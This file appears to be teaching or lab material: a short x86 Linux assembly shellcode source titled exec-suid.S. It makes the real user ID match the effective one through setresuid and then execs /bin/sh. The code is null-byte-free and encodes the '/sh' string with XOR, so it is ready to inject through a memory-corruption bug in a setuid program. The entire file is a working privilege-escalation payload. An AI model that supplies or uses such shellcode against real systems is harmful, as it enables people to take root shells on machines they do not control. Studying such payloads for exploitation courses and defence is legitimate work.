shellcode/exec-suid.S


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

.global _start
_start:
	xorl %eax, %eax
	addb $201, %al # geteuid
	int $0x80
	movl %eax, %ebx
	movl %eax, %ecx
	movl %eax, %edx
	xorl %eax, %eax
	addb $208, %al # setresuid
	int $0x80
	xorl %eax, %eax
	addb $11, %al
	movl $0x3058431f, %ebx
	xorl $0x30303030, %ebx # "/sh\0"
	pushl %ebx
	pushl $0x6e69622f # "/bin"
	movl %esp, %ebx
	xorl %ecx, %ecx
	xorl %edx, %edx
	int $0x80